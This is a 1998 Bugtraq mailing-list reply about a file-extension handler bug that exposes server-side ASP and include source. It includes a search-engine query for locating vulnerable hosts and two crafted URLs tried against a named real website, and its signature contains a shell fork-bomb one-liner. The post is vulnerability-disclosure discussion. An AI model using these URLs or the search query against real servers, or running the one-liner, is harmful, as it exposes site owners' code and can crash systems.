[6190] in bugtraq
Re: Handler Mapped File Extensions Bug
daemon@ATHENA.MIT.EDU (Michal Zalewski)
Sat Feb 28 11:14:21 1998
Date: Sat, 28 Feb 1998 11:52:30 +0100
Reply-To: Michal Zalewski <lcamtuf@BOSS.STASZIC.WAW.PL>
From: Michal Zalewski <lcamtuf@BOSS.STASZIC.WAW.PL>
X-To: Darryl Braaten <DBraaten@IMG.SEAGATESOFTWARE.COM>
To: BUGTRAQ@NETSPACE.ORG
>I could not reproduce the ability to read raw source. Perhaps the
>system that it was possible to read the source from did not have the .
>bug fix applied.
Use HotBot search engine to locate vunerable machines:
http://www.search.hotbot.com/hResult.html?MT=3DError+processing+SSI+fil=
e&SM=3Dphrase&DV=3D7&RG=3D.com&DC=3D100&DE=3D2&OPs=3DMDRTP&_v=3D2&DU=3D=
days&SW=3Dweb&search.x=3D37&search.y=3D14
I tried this:
http://www.beleggingswedstrijd.ie.nl/asp/something.stm/asp/Index.asp
http://www.beleggingswedstrijd.ie.nl/include/something.stm/include/Misc=
.stm
It works.
_______________________________________________________________________
Micha=B3 Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.p=
l]
Iterowa=E6 jest rzecz=B1 ludzk=B1, wykonywa=E6 rekursywnie - bosk=B1 [P=
. Deustch]
=3D--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] ----------------=
-=3D
